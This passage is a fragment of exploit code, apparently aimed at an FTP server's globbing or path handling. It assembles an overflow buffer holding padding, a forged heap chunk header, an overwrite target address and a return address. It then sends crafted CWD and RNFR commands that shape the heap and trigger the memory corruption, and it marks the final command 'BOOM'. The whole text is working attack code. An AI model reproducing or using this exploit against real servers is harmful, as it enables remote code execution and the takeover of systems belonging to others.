blaat.append('A', 96+32); /* padding */ blaat.append(0xfffffff0); /* the chunk */ blaat.append(-4); blaat.append( 0x0806f7ac - 12 ); blaat.append( 0xbffffb49 ); conn.sendout("CWD %s\r\n", blaat.c_str()); conn.sendout("CWD %s\r\n", "~/{.,.,.,.}"); /*getting pointer on the heap */ conn.sendout("RNFR %s\r\n", "././././././././"); /* 24 */ conn.sendout("CWD %s\r\n", "AAAAsiz"); /* buidling size field */ conn.sendout("CWD %s\r\n", "AAAAsi"); conn.sendout("CWD %s\r\n", "AAAA\x69"); conn.sendout("RNFR .\r\n"); /* keeping it malloced */ conn.sendout("RNFR %s\r\n", "././././././././"); /* filling */ conn.sendout("CWD ~{\r\n"); /* BOOM */